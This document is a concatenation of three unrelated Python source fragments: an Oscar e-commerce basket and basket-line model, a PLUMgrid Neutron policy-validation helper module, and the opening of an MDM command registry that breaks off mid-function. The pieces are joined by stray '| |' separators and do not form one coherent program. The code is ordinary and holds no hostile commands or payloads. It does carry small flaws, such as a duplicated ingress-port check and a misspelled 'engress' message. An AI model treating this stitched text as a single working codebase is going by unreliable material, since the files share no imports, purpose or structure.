_("Status"), max_length=128, default=OPEN, choices=STATUS_CHOICES)
# A basket can have many vouchers attached to it. However, it is common
# for sites to only allow one voucher per basket - this will need to be
# enforced in the project's codebase.
vouchers = models.ManyToManyField(
'voucher.Voucher', null=True, verbose_name=_("Vouchers"), blank=True)
date_created = models.DateTimeField(_("Date created"), auto_now_add=True)
date_merged = models.DateTimeField(_("Date merged"), null=True, blank=True)
date_submitted = models.DateTimeField(_("Date submitted"), null=True,
blank=True)
# Only if a basket is in one of these statuses can it be edited
editable_statuses = (OPEN, SAVED)
class Meta:
abstract = True
app_label = 'basket'
verbose_name = _('Basket')
verbose_name_plural = _('Baskets')
objects = models.Manager()
open = OpenBasketManager()
saved = SavedBasketManager()
def __init__(self, *args, **kwargs):
super(AbstractBasket, self).__init__(*args, **kwargs)
# We keep a cached copy of the basket lines as we refer to them often
# within the same request cycle. Also, applying offers will append
# discount data to the basket lines which isn't persisted to the DB and
# so we want to avoid reloading them as this would drop the discount
# information.
self._lines = None
self.offer_applications = results.OfferApplications()
def __unicode__(self):
return _(
u"%(status)s basket (owner: %(owner)s, lines: %(num_lines)d)") \
% {'status': self.status,
'owner': self.owner,
'num_lines': self.num_lines}
# ========
# Strategy
# ========
@property
def has_strategy(self):
return hasattr(self, '_strategy')
def _get_strategy(self):
if not self.has_strategy:
raise RuntimeError(
"No strategy class has been assigned to this basket. "
"This is normally assigned to the incoming request in "
"oscar.apps.basket.middleware.BasketMiddleware. "
"Since it is missing, you must be doing something different. "
"Ensure that a strategy instance is assigned to the basket!"
)
return self._strategy
def _set_strategy(self, strategy):
self._strategy = strategy
strategy = property(_get_strategy, _set_strategy)
def all_lines(self):
"""
Return a cached set of basket lines.
This is important for offers as they alter the line models and you
don't want to reload them from the DB as that information would be
lost.
"""
if self.id is None:
return self.lines.none()
if self._lines is None:
self._lines = (
self.lines
.select_related('product', 'stockrecord')
.prefetch_related(
'attributes', 'product__images'))
return self._lines
def is_quantity_allowed(self, qty):
"""
Test whether the passed quantity of items can be added to the basket
"""
# We enfore a max threshold to prevent a DOS attack via the offers
# system.
basket_threshold = settings.OSCAR_MAX_BASKET_QUANTITY_THRESHOLD
if basket_threshold:
total_basket_quantity = self.num_items
max_allowed = basket_threshold - total_basket_quantity
if qty > max_allowed:
return False, _(
"Due to technical limitations we are not able "
"to ship more than %(threshold)d items in one order.") \
% {'threshold': basket_threshold}
return True, None
# ============
# Manipulation
# ============
def flush(self):
"""
Remove all lines from basket.
"""
if self.status == self.FROZEN:
raise PermissionDenied("A frozen basket cannot be flushed")
self.lines.all().delete()
self._lines = None
def add_product(self, product, quantity=1, options=None):
"""
Add a product to the basket
'stock_info' is the price and availability data returned from
a partner strategy class.
The 'options' list should contains dicts with keys 'option' and 'value'
which link the relevant product.Option model and string value
respectively.
"""
if options is None:
options = []
if not self.id:
self.save()
# Ensure that all lines are the same currency
price_currency = self.currency
stock_info = self.strategy.fetch_for_product(product)
if price_currency and stock_info.price.currency != price_currency:
raise ValueError((
"Basket lines must all have the same currency. Proposed "
"line has currency %s, while basket has currency %s")
% (stock_info.price.currency, price_currency))
if stock_info.stockrecord is None:
raise ValueError((
"Basket lines must all have stock records. Strategy hasn't "
"found any stock record for product %s") % product)
# Line reference is used to distinguish between variations of the same
# product (eg T-shirts with different personalisations)
line_ref = self._create_line_reference(
product, stock_info.stockrecord, options)
# Determine price to store (if one exists). It is only stored for
# audit and sometimes caching.
defaults = {
'quantity': quantity,
'price_excl_tax': stock_info.price.excl_tax,
'price_currency': stock_info.price.currency,
}
if stock_info.price.is_tax_known:
defaults['price_incl_tax'] = stock_info.price.incl_tax
line, created = self.lines.get_or_create(
line_reference=line_ref,
product=product,
stockrecord=stock_info.stockrecord,
defaults=defaults)
if created:
for option_dict in options:
line.attributes.create(option=option_dict['option'],
value=option_dict['value'])
else:
line.quantity += quantity
line.save()
self.reset_offer_applications()
add_product.alters_data = True
add = add_product
def applied_offers(self):
"""
Return a dict of offers successfully applied to the basket.
This is used to compare offers before and after a basket change to see
if there is a difference.
"""
return self.offer_applications.offers
def reset_offer_applications(self):
"""
Remove any discounts so they get recalculated
"""
self.offer_applications = results.OfferApplications()
self._lines = None
def merge_line(self, line, add_quantities=True):
"""
For transferring a line from another basket to this one.
This is used with the "Saved" basket functionality.
"""
try:
existing_line = self.lines.get(line_reference=line.line_reference)
except ObjectDoesNotExist:
# Line does not already exist - reassign its basket
line.basket = self
line.save()
else:
# Line already exists - assume the max quantity is correct and
# delete the old
if add_quantities:
existing_line.quantity += line.quantity
else:
existing_line.quantity = max(existing_line.quantity,
line.quantity)
existing_line.save()
line.delete()
finally:
self._lines = None
merge_line.alters_data = True
def merge(self, basket, add_quantities=True):
"""
Merges another basket with this one.
:basket: The basket to merge into this one.
:add_quantities: Whether to add line quantities when they are merged.
"""
# Use basket.lines.all instead of all_lines as this function is called
# before a strategy has been assigned.
for line_to_merge in basket.lines.all():
self.merge_line(line_to_merge, add_quantities)
basket.status = self.MERGED
basket.date_merged = now()
basket._lines = None
basket.save()
# Ensure all vouchers are moved to the new basket
for voucher in basket.vouchers.all():
basket.vouchers.remove(voucher)
self.vouchers.add(voucher)
merge.alters_data = True
def freeze(self):
"""
Freezes the basket so it cannot be modified.
"""
self.status = self.FROZEN
self.save()
freeze.alters_data = True
def thaw(self):
"""
Unfreezes a basket so it can be modified again
"""
self.status = self.OPEN
self.save()
thaw.alters_data = True
def submit(self):
"""
Mark this basket as submitted
"""
self.status = self.SUBMITTED
self.date_submitted = now()
self.save()
submit.alters_data = True
# Kept for backwards compatibility
set_as_submitted = submit
def is_shipping_required(self):
"""
Test whether the basket contains physical products that require
shipping.
"""
for line in self.all_lines():
if line.product.is_shipping_required:
return True
return False
# =======
# Helpers
# =======
def _create_line_reference(self, product, stockrecord, options):
"""
Returns a reference string for a line based on the item
and its options.
"""
base = '%s_%s' % (product.id, stockrecord.id)
if not options:
return base
return "%s_%s" % (base, zlib.crc32(repr(options).encode('utf8')))
def _get_total(self, property):
"""
For executing a named method on each line of the basket
and returning the total.
"""
total = D('0.00')
for line in self.all_lines():
try:
total += getattr(line, property)
except ObjectDoesNotExist:
# Handle situation where the product may have been deleted
pass
return total
# ==========
# Properties
# ==========
@property
def is_empty(self):
"""
Test if this basket is empty
"""
return self.id is None or self.num_lines == 0
@property
def is_tax_known(self):
"""
Test if tax values are known for this basket
"""
return all([line.is_tax_known for line in self.all_lines()])
@property
def total_excl_tax(self):
"""
Return total line price excluding tax
"""
return self._get_total('line_price_excl_tax_incl_discounts')
@property
def total_tax(self):
"""Return total tax for a line"""
return self._get_total('line_tax')
@property
def total_incl_tax(self):
"""
Return total price inclusive of tax and discounts
"""
return self._get_total('line_price_incl_tax_incl_discounts')
@property
def total_incl_tax_excl_discounts(self):
"""
Return total price inclusive of tax but exclusive discounts
"""
return self._get_total('line_price_incl_tax')
@property
def total_discount(self):
return self._get_total('discount_value')
@property
def offer_discounts(self):
"""
Return basket discounts from non-voucher sources. Does not include
shipping discounts.
"""
return self.offer_applications.offer_discounts
@property
def voucher_discounts(self):
"""
Return discounts from vouchers
"""
return self.offer_applications.voucher_discounts
@property
def has_shipping_discounts(self):
return len(self.shipping_discounts) > 0
@property
def shipping_discounts(self):
"""
Return discounts from vouchers
"""
return self.offer_applications.shipping_discounts
@property
def post_order_actions(self):
"""
Return discounts from vouchers
"""
return self.offer_applications.post_order_actions
@property
def grouped_voucher_discounts(self):
"""
Return discounts from vouchers but grouped so that a voucher which
links to multiple offers is aggregated into one object.
"""
return self.offer_applications.grouped_voucher_discounts
@property
def total_excl_tax_excl_discounts(self):
"""
Return total price excluding tax and discounts
"""
return self._get_total('line_price_excl_tax')
@property
def num_lines(self):
"""Return number of lines"""
return self.all_lines().count()
@property
def num_items(self):
"""Return number of items"""
return sum(line.quantity for line in self.lines.all())
@property
def num_items_without_discount(self):
num = 0
for line in self.all_lines():
num += line.quantity_without_discount
return num
@property
def num_items_with_discount(self):
num = 0
for line in self.all_lines():
num += line.quantity_with_discount
return num
@property
def time_before_submit(self):
if not self.date_submitted:
return None
return self.date_submitted - self.date_created
@property
def time_since_creation(self, test_datetime=None):
if not test_datetime:
test_datetime = now()
return test_datetime - self.date_created
@property
def contains_a_voucher(self):
if not self.id:
return False
return self.vouchers.exists()
@property
def is_submitted(self):
return self.status == self.SUBMITTED
@property
def can_be_edited(self):
"""
Test if a basket can be edited
"""
return self.status in self.editable_statuses
@property
def currency(self):
# Since all lines should have the same currency, return the currency of
# the first one found.
for line in self.all_lines():
return line.price_currency
# =============
# Query methods
# =============
def contains_voucher(self, code):
"""
Test whether the basket contains a voucher with a given code
"""
if self.id is None:
return False
try:
self.vouchers.get(code=code)
except ObjectDoesNotExist:
return False
else:
return True
def product_quantity(self, product):
"""
Return the quantity of a product in the basket
The basket can contain multiple lines with the same product, but
different options and stockrecords. Those quantities are summed up.
"""
matching_lines = self.lines.filter(product=product)
quantity = matching_lines.aggregate(Sum('quantity'))['quantity__sum']
return quantity or 0
def line_quantity(self, product, stockrecord, options=None):
"""
Return the current quantity of a specific product and options
"""
ref = self._create_line_reference(product, stockrecord, options)
try:
return self.lines.get(line_reference=ref).quantity
except ObjectDoesNotExist:
return 0
class AbstractLine(models.Model):
"""
A line of a basket (product and a quantity)
"""
basket = models.ForeignKey('basket.Basket', related_name='lines',
verbose_name=_("Basket"))
# This is to determine which products belong to the same line
# We can't just use product.id as you can have customised products
# which should be treated as separate lines. Set as a
# SlugField as it is included in the path for certain views.
line_reference = models.SlugField(
_("Line Reference"), max_length=128, db_index=True)
product = models.ForeignKey(
'catalogue.Product', related_name='basket_lines',
verbose_name=_("Product"))
# We store the stockrecord that should be used to fulfil this line.
stockrecord = models.ForeignKey(
'partner.StockRecord', related_name='basket_lines')
quantity = models.PositiveIntegerField(_('Quantity'), default=1)
# We store the unit price incl tax of the product when it is first added to
# the basket. This allows us to tell if a product has changed price since
# a person first added it to their basket.
price_currency = models.CharField(
_("Currency"), max_length=12, default=settings.OSCAR_DEFAULT_CURRENCY)
price_excl_tax = models.DecimalField(
_('Price excl. Tax'), decimal_places=2, max_digits=12,
null=True)
price_incl_tax = models.DecimalField(
_('Price incl. Tax'), decimal_places=2, max_digits=12, null=True)
# Track date of first addition
date_created = models.DateTimeField(_("Date Created"), auto_now_add=True)
def __init__(self, *args, **kwargs):
super(AbstractLine, self).__init__(*args, **kwargs)
# Instance variables used to persist discount information
self._discount_excl_tax = D('0.00')
self._discount_incl_tax = D('0.00')
self._affected_quantity = 0
class Meta:
abstract = True
app_label = 'basket'
unique_together = ("basket", "line_reference")
verbose_name = _('Basket line')
verbose_name_plural = _('Basket lines')
def __unicode__(self):
return _(
u"Basket #%(basket_id)d, Product #%(product_id)d, quantity"
u" %(quantity)d") % {'basket_id': self.basket.pk,
'product_id': self.product.pk,
'quantity': self.quantity}
def save(self, *args, **kwargs):
if not self.basket.can_be_edited:
raise PermissionDenied(
_("You cannot modify a %s basket") % (
self.basket.status.lower(),))
return super(AbstractLine, self).save(*args, **kwargs)
# =============
# Offer methods
# =============
def clear_discount(self):
"""
Remove any discounts from this line.
"""
self._discount_excl_tax = D('0.00')
self._discount_incl_tax = D('0.00')
self._affected_quantity = 0
def discount(self, discount_value, affected_quantity, incl_tax=True):
"""
Apply a discount to this line
"""
if incl_tax:
if self._discount_excl_tax > 0:
raise RuntimeError(
"Attempting to discount the tax-inclusive price of a line "
"when tax-exclusive discounts are already applied")
self._discount_incl_tax += discount_value
else:
if self._discount_incl_tax > 0:
raise RuntimeError(
"Attempting to discount the tax-exclusive price of a line "
"when tax-inclusive discounts are already applied")
self._discount_excl_tax += discount_value
self._affected_quantity += int(affected_quantity)
def consume(self, quantity):
"""
Mark all or part of the line as 'consumed'
Consumed items are no longer available to be used in offers.
"""
if quantity > self.quantity - self._affected_quantity:
inc = self.quantity - self._affected_quantity
else:
inc = quantity
self._affected_quantity += int(inc)
def get_price_breakdown(self):
"""
Return a breakdown of line prices after discounts have been applied.
Returns a list of (unit_price_incl_tx, unit_price_excl_tax, quantity)
tuples.
"""
if not self.is_tax_known:
raise RuntimeError("A price breakdown can only be determined "
"when taxes are known")
prices = []
if not self.discount_value:
prices.append((self.unit_price_incl_tax, self.unit_price_excl_tax,
self.quantity))
else:
# Need to split the discount among the affected quantity
# of products.
item_incl_tax_discount = (
self.discount_value / int(self._affected_quantity))
item_excl_tax_discount = item_incl_tax_discount * self._tax_ratio
item_excl_tax_discount = item_excl_tax_discount.quantize(D('0.01'))
prices.append((self.unit_price_incl_tax - item_incl_tax_discount,
self.unit_price_excl_tax - item_excl_tax_discount,
self._affected_quantity))
if self.quantity_without_discount:
prices.append((self.unit_price_incl_tax,
self.unit_price_excl_tax,
self.quantity_without_discount))
return prices
# =======
# Helpers
# =======
@property
def _tax_ratio(self):
if not self.unit_price_incl_tax:
return 0
return self.unit_price_excl_tax / self.unit_price_incl_tax
# ==========
# Properties
# ==========
@property
def has_discount(self):
return self.quantity > self.quantity_without_discount
@property
def quantity_with_discount(self):
return self._affected_quantity
@property
def quantity_without_discount(self):
return int(self.quantity - self._affected_quantity)
@property
def is_available_for_discount(self):
return self.quantity_without_discount > 0
@property
def discount_value(self):
# Only one of the incl- and excl- discounts should be non-zero
return max(self._discount_incl_tax, self._discount_excl_tax)
@property
def purchase_info(self):
"""
Return the stock/price info
"""
if not hasattr(self, '_info'):
# Cache the PurchaseInfo instance.
self._info = self.basket.strategy.fetch_for_product(
self.product, self.stockrecord)
return self._info
@property
def is_tax_known(self):
return self.purchase_info.price.is_tax_known
@property
def unit_effective_price(self):
"""
The price to use for offer calculations
"""
return self.purchase_info.price.effective_price
@property
def unit_price_excl_tax(self):
return self.purchase_info.price.excl_tax
@property
def unit_price_incl_tax(self):
return self.purchase_info.price.incl_tax
@property
def unit_tax(self):
return self.purchase_info.price.tax
@property
def line_price_excl_tax(self):
return self.quantity * self.unit_price_excl_tax
@property
def line_price_excl_tax_incl_discounts(self):
if self._discount_excl_tax:
return self.line_price_excl_tax - self._discount_excl_tax
if self._discount_incl_tax:
# This is a tricky situation. We know the discount as calculated
# against tax inclusive prices but we need to guess how much of the
# discount applies to tax-exclusive prices. We do this by
# assuming a linear tax and scaling down the original discount.
return self.line_price_excl_tax \
- self._tax_ratio * self._discount_incl_tax
return self.line_price_excl_tax
@property
def line_price_incl_tax_incl_discounts(self):
# We use whichever discount value is set. If the discount value was
# calculated against the tax-exclusive prices, then the line price
# including tax
return self.line_price_incl_tax - self.discount_value
@property
def line_tax(self):
return self.quantity * self.unit_tax
@property
def line_price_incl_tax(self):
return self.quantity * self.unit_price_incl_tax
@property
def description(self):
d = str(self.product)
ops = []
for attribute in self.attributes.all():
ops.append("%s = '%s'" % (attribute.option.name, attribute.value))
if ops:
d = "%s (%s)" % (d.decode('utf-8'), ", ".join(ops))
return d
def get_warning(self):
"""
Return a warning message about this basket line if one is applicable
This could be things like the price has changed
"""
if not self.stockrecord:
msg = u"'%(product)s' is no longer available"
return _(msg) % {'product': self.product.get_title()}
if not self.price_incl_tax:
return
if not self.purchase_info.price.is_tax_known:
return
# Compare current price to price when added to basket
current_price_incl_tax = self.purchase_info.price.incl_tax
if current_price_incl_tax != self.price_incl_tax:
product_prices = {
'product': self.product.get_title(),
'old_price': currency(self.price_incl_tax),
'new_price': currency(current_price_incl_tax)
}
if current_price_incl_tax > self.price_incl_tax:
warning = _("The price of '%(product)s' has increased from"
" %(old_price)s to %(new_price)s since you added"
" it to your basket")
return warning % product_prices
else:
warning = _("The price of '%(product)s' has decreased from"
" %(old_price)s to %(new_price)s since you added"
" it to your basket")
return warning % product_prices
class AbstractLineAttribute(models.Model):
"""
An attribute of a basket line
"""
line = models.ForeignKey('basket.Line', related_name='attributes',
verbose_name=_("Line"))
option = models.ForeignKey('catalogue.Option', verbose_name=_("Option"))
value = models.CharField(_("Value"), max_length=255)
class Meta:
abstract = True
app_label = 'basket'
verbose_name = _('Line attribute')
verbose_name_plural = _('Line attributes')
| |
# Copyright 2016 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# service type constants:
from networking_plumgrid.neutron.plugins.common import constants as \
net_pg_const
from networking_plumgrid.neutron.plugins.common import exceptions as plum_excep
from networking_plumgrid.neutron.plugins.common import \
policy_exceptions as policy_exc
from oslo_log import log as logging
from oslo_utils import uuidutils
LOG = logging.getLogger(__name__)
def _retrieve_subnet_dict(self, port_db, context):
"""
Helper function to retrieve the subnet dictionary
"""
# Retrieve subnet information
subnet_db = {}
if len(port_db["fixed_ips"]) != 0:
for subnet_index in range(0,
len(port_db["fixed_ips"])):
subnet_id = (port_db["fixed_ips"][subnet_index]
["subnet_id"])
subnet_db[subnet_index] = self._get_subnet(context, subnet_id)
return subnet_db
def _check_floatingip_in_use(self, fp_id, ptag_db):
"""
Helper function to check if Floating IP already exists and
is associated with a SecurityGroup/PolicyTag
"""
for entry in ptag_db:
if fp_id == entry["floatingip_id"]:
return True
return False
def _check_floatingip_network(self, context, ptag_db):
"""
Helper function to check Floating IP is from the specified
External Network
"""
floatingip_db = self.get_floatingip(context,
ptag_db["policy_tag"]["floatingip_id"])
router_db = self.get_routers(context,
filters={"tenant_id": [ptag_db["policy_tag"]["tenant_id"]]})
floating_net_id = floatingip_db["floating_network_id"]
if floatingip_db.get('port_id') is not None:
raise policy_exc.FloatingIPAlreadyInUse(id=str(floatingip_db["id"]))
external_gateway = []
if "router_id" in ptag_db["policy_tag"] and \
ptag_db["policy_tag"]["router_id"] is not None:
external_gateway.append(ptag_db["policy_tag"]["router_id"])
else:
for router in router_db:
if ("external_gateway_info" in router and
router["external_gateway_info"] and
router["external_gateway_info"]
["network_id"] == floating_net_id):
external_gateway.append(router["id"])
if len(external_gateway) == 0:
raise policy_exc.GatewayNotSet(id=str(floatingip_db["id"]))
if len(external_gateway) > 1:
raise policy_exc.MultipleExternalGatewaysFound(
gateway_list=external_gateway)
return (floatingip_db, external_gateway[0])
def _check_duplicate_ports_policy_service_create(self, ps_db):
"""
Helper function to check if duplicate ingress, egress, bidirectional
ports exists in create policy service JSON
"""
port_list = []
if "ingress_ports" in ps_db and ps_db["ingress_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["ingress_ports"]]))
if _check_duplicate_ports_config(ps_db["ingress_ports"]):
return True, "ingress ports"
if "egress_ports" in ps_db and ps_db["egress_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["egress_ports"]]))
if _check_duplicate_ports_config(ps_db["egress_ports"]):
return True, "egress ports"
if "bidirectional_ports" in ps_db and ps_db["bidirectional_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["bidirectional_ports"]]))
if _check_duplicate_ports_config(ps_db["bidirectional_ports"]):
return True, "bidirectional ports"
if _check_duplicate_ports_across_config(port_list):
return True, "create parameters"
return False, None
def _check_duplicate_ports_policy_service_update(self, ps_db):
"""
Helper function to check if duplicate ingress, egress, bidirectional
ports exists in update policy service JSON
"""
port_list = []
if "add_ingress_ports" in ps_db and ps_db["add_ingress_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["add_ingress_ports"]]))
if _check_duplicate_ports_config(ps_db["add_ingress_ports"]):
return True, "add ingress ports"
if "add_egress_ports" in ps_db and ps_db["add_egress_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["add_egress_ports"]]))
if _check_duplicate_ports_config(ps_db["add_egress_ports"]):
return True, "add egress ports"
if "add_bidirectional_ports" in ps_db and ps_db["add_bidirectional_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["add_bidirectional_ports"]]))
if _check_duplicate_ports_config(ps_db["add_bidirectional_ports"]):
return True, "add bidirectional ports"
if "remove_ingress_ports" in ps_db and ps_db["remove_ingress_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["remove_ingress_ports"]]))
if _check_duplicate_ports_config(ps_db["remove_ingress_ports"]):
return True, "remove ingress ports"
if "remove_egress_ports" in ps_db and ps_db["remove_egress_ports"]:
port_list.append(set([tuple(d.items()) for d
in ps_db["remove_egress_ports"]]))
if _check_duplicate_ports_config(ps_db["remove_egress_ports"]):
return True, "remove engress ports"
if ("remove_bidirectional_ports" in ps_db
and ps_db["remove_bidirectional_ports"]):
port_list.append(set([tuple(d.items()) for d
in ps_db["remove_bidirectional_ports"]]))
if _check_duplicate_ports_config(ps_db["remove_bidirectional_ports"]):
return True, "remove bidirectional ports"
if _check_duplicate_ports_across_config(port_list):
return True, "update parameters"
return False, None
def _check_duplicate_ports_config(port_db):
if (len(port_db) > len([dict(t) for t in
set([tuple(d.items()) for d in port_db])])):
return True
def _check_duplicate_ports_across_config(list_port_db):
for i in range(0, len(list_port_db)):
for j in range(i + 1, len(list_port_db)):
if (len(list_port_db[i].intersection(list_port_db[j])) > 0):
return True
def _validate_port_owner(port_db):
"""
Helper function to validate port is owned by a compute resource
"""
if ("device_owner" in port_db and "binding:vif_type" in port_db and
"compute" in port_db["device_owner"] and
port_db["binding:vif_type"] == net_pg_const.BINDING_VIF_TYPE_IOVISOR):
return True
return False
def _check_policy_service_leg_mode(ps_obj, updated_ps_obj=None):
"""
Helper function to check if bidirectional ports are
specified with ingress or egress ports
"""
if ("ingress_ports" in ps_obj and "egress_ports"
in ps_obj and "bidirectional_ports" in ps_obj):
if updated_ps_obj is None:
if ((ps_obj["ingress_ports"] or ps_obj["egress_ports"])
and ps_obj["bidirectional_ports"]):
return True
else:
if ps_obj["ingress_ports"] or ps_obj["egress_ports"]:
if ("add_bidirectional_ports" in updated_ps_obj or
"remove_bidirectional_ports" in updated_ps_obj):
return True
elif ps_obj["bidirectional_ports"]:
if ("add_ingress_ports" in updated_ps_obj or
"add_egress_ports" in updated_ps_obj or
"remove_ingress_ports" in updated_ps_obj or
"remove_egress_ports" in updated_ps_obj):
return True
else:
#Update call with any prior ports in policy service
if ((("add_ingress_ports" in updated_ps_obj or
"add_ingress_ports" in updated_ps_obj)
or ("remove_ingress_ports" in updated_ps_obj or
"remove_egress_ports" in updated_ps_obj))
and ("add_bidirectional_ports" in updated_ps_obj or
"remove_bidirectional_ports" in updated_ps_obj)):
return True
return False
def _is_security_group(context, ep_obj, ep_db, config):
if config in ep_db and ep_db[config]:
for epg in ep_db[config]:
epg_id_list = ep_obj.get_endpoint_groups(context,
filters={'id': [epg['id']]},
fields=["id"])
if len(epg_id_list) == 1:
if ("is_security_group" in epg_id_list[0]
and epg_id_list[0]["is_security_group"]):
operation = "Endpoint association"
raise policy_exc.OperationNotAllowed(operation=operation,
id=epg_id_list[0]["id"])
def _validate_ep_config(ep_db):
if ((ep_db["ip_mask"] and ep_db["ip_port"]) or
(ep_db["ip_mask"]and ep_db["port_id"]) or
(ep_db["ip_port"] and ep_db["port_id"])):
raise policy_exc.MultipleAssociationForEndpoint()
def _check_duplicates_endpoint_config(ep_db):
if "ep_groups" in ep_db and ep_db["ep_groups"]:
if (len(ep_db["ep_groups"]) > len([dict(t) for t in
set([tuple(d.items()) for d in ep_db["ep_groups"]])])):
raise policy_exc.DuplicateEndpointGroup()
if "add_endpoint_groups" in ep_db and ep_db["add_endpoint_groups"]:
if (len(ep_db["add_endpoint_groups"]) > len([dict(t) for t in
set([tuple(d.items()) for d in ep_db["add_endpoint_groups"]])])):
raise policy_exc.DuplicateEndpointGroup()
if "remove_endpoint_groups" in ep_db and ep_db["remove_endpoint_groups"]:
if (len(ep_db["remove_endpoint_groups"]) > len([dict(t) for t in
set([tuple(d.items()) for d in
ep_db["remove_endpoint_groups"]])])):
raise policy_exc.DuplicateEndpointGroup()
if (("add_endpoint_groups" in ep_db and ep_db["add_endpoint_groups"]) and
("remove_endpoint_groups" in ep_db
and ep_db["remove_endpoint_groups"])):
if (len(set([tuple(d.items()) for d in ep_db["add_endpoint_groups"]]).
intersection(set([tuple(d.items()) for d in
ep_db["remove_endpoint_groups"]]))) > 0):
raise policy_exc.DuplicateEndpointGroup()
def _process_policy_tag(self, context, epg_db):
if "policy_tag_id" in epg_db and epg_db["policy_tag_id"]:
if (not uuidutils.is_uuid_like(epg_db['policy_tag_id']) and
epg_db['policy_tag_id'] is not None):
ptag_list = self.get_policy_tags(context,
filters={'name': [epg_db['policy_tag_id']]},
fields=["id"])
if len(ptag_list) == 1:
epg_db['policy_tag_id'] = ptag_list[0]["id"]
elif len(ptag_list) == 0:
err_message = ("No policy tag"
" matches found for tag"
" '%s'" % epg_db['policy_tag_id'])
raise plum_excep.PLUMgridException(err_msg=err_message)
else:
err_message = ("Multiple policy tag"
" matches found for tag"
" '%s', use an ID to be more"
" specific." % epg_db['policy_tag_id'])
raise plum_excep.PLUMgridException(err_msg=err_message)
return epg_db
def _process_epg_update(self, context, epg_db):
ptag_db = {}
if "policy_tag_id" in epg_db and epg_db["policy_tag_id"]:
config = "policy_tag_id"
elif "add_tag" in epg_db and epg_db["add_tag"]:
config = "add_tag"
elif "remove_tag" in epg_db and epg_db["remove_tag"]:
config = "remove_tag"
else:
config = None
if config in epg_db and epg_db[config]:
if (not uuidutils.is_uuid_like(epg_db[config]) and
epg_db[config] is not None):
ptag_list = self.get_policy_tags(context,
filters={'name': [epg_db[config]]},
fields=["id"])
if len(ptag_list) == 1:
epg_db[config] = ptag_list[0]["id"]
ptag_db = self.get_policy_tag(context,
ptag_list[0]["id"])
elif len(ptag_list) == 0:
err_message = ("No policy tag"
" matches found for tag"
" '%s'" % epg_db[config])
raise plum_excep.PLUMgridException(err_msg=err_message)
else:
err_message = ("Multiple policy tag"
" matches found for tag"
" '%s', use an ID to be more"
" specific." % epg_db[config])
raise plum_excep.PLUMgridException(err_msg=err_message)
elif (uuidutils.is_uuid_like(epg_db[config]) and
epg_db[config] is not None):
ptag_id = epg_db[config]
ptag_db = self.get_policy_tag(context,
ptag_id)
return (epg_db, ptag_db)
def _check_policy_service_in_use(self, context, id):
"""
Helper function to check policy service is in use by
any policy rule
"""
pr_list = self.get_policy_rules(context,
fields=["id", "action_target"])
action_target_list = []
for rule in pr_list:
if _check_remote_action_target(rule):
action_target_list.append((rule["action_target"].split(":"))[1])
else:
action_target_list.append(rule["action_target"])
in_use_list = filter(lambda x: x == id, action_target_list)
if len(in_use_list) > 0:
raise policy_exc.PolicyServiceInUsePolicyRule(id=id)
def _recursive_delete_endpoints(self, context, id):
"""
Helper function to delete endpoints when endpoint group
is deleted
"""
endpoint_list = self.get_endpoints(context,
filters={'ep_groups': [{'id': id}]})
for endpoint in endpoint_list:
if ((len(endpoint["ep_groups"]) == 1) and
endpoint["ep_groups"][0]["id"] == id):
self.delete_endpoint(context, endpoint["id"])
def _check_remote_action_target(pr_db):
"""
Helper function to check if action target for policy rule
is for a tenant id
"""
if "action_target" in pr_db and pr_db["action_target"]:
action_target_db = pr_db["action_target"].split(":")
if len(action_target_db) == 2:
return True
else:
return False
def _update_port_description(port_db, port_data):
"""
Helper function to update port description
"""
if "description" in port_data:
port_db["description"] = port_data["description"]
| |
from enum import Enum
from uuid import uuid4, UUID
from typing import Dict, Set, List, Type, ClassVar, Any, Optional, Tuple
import semver
from base64 import urlsafe_b64encode, urlsafe_b64decode
from . import AccessRights, AccessRightsSet, Platform
PlatformVersion = str
PlatformRequirements = Dict[Platform, PlatformVersion]
class CommandRegistry(type):
command_classes: Dict[str, Type] = {}
def __new__(mcs, name, bases, namespace, **kwds):
ns = dict(namespace)
klass = type.__new__(mcs, name, bases, ns)
if 'request_type' in ns:
CommandRegistry.command_classes[ns['request_type']] = klass
return klass
class Command(metaclass=CommandRegistry):
# request_type: ClassVar[str] = None
"""request_type (str): The MDM RequestType, as specified in the MDM Specification."""
# require_access: ClassVar[AccessRightsSet] = set()
"""require_access (Set[AccessRights]): Access required for the MDM to execute the command on this device."""
# require_platforms: ClassVar[PlatformRequirements] = dict()
"""require_platforms (PlatformRequirements): A dict of Platform : version predicate string, to indicate which
platforms will accept the command"""
# require_supervised: ClassVar[bool] = False
"""require_supervised (bool): This command requires supervision on iOS/tvOS"""
def __init__(self, uuid=None) -> None:
"""The Command class wraps an MDM Request Command dict to provide validation and convenience methods for
accessing command attributes.
All commands are serialised to the same table as JSON, so the validation is performed here.
Args:
uuid (UUID): The command uuid. Defaults to an automatically generated uuid.
"""
if uuid is None:
uuid = uuid4()
self._uuid: UUID = uuid
self._attrs: Dict[str, Any] = {}
# self.request_type: Optional[str] = None
# self.require_access: AccessRightsSet = set()
# self.require_platforms: PlatformRequirements = dict()
# self.require_supervised: bool = False
@property
def uuid(self) -> UUID:
return self._uuid
@property
def parameters(self) -> Dict[str, Any]:
return self._attrs
@classmethod
def new_request_type(cls, request_type: str, parameters: dict, uuid: str = None) -> 'Command':
"""Factory method for instantiating a command based on its class attribute ``request_type``.
Additionally, the dict given in parameters will be applied to the command instance.
Commands that have no parameters are not required to implement to_dict().
Args:
request_type (str): The command request type, as defined in the class attribute ``request_type``.
parameters (dict): The parameters of this command instance.
uuid (str): The command UUID. Optional, will be generated if omitted.
Raises:
ValueError if there is no command matching the request type given.
Returns:
Command class that corresponds to the request type given. Inherits from Command.
"""
if request_type in CommandRegistry.command_classes:
klass = CommandRegistry.command_classes[request_type]
return klass(uuid, **parameters)
else:
raise ValueError('No such RequestType registered: {}'.format(request_type))
def to_dict(self) -> dict:
"""Convert the command into a dict that will be serializable by plistlib.
This default implementation will work for command types that have no parameters.
"""
command = {'RequestType': self.request_type}
return {
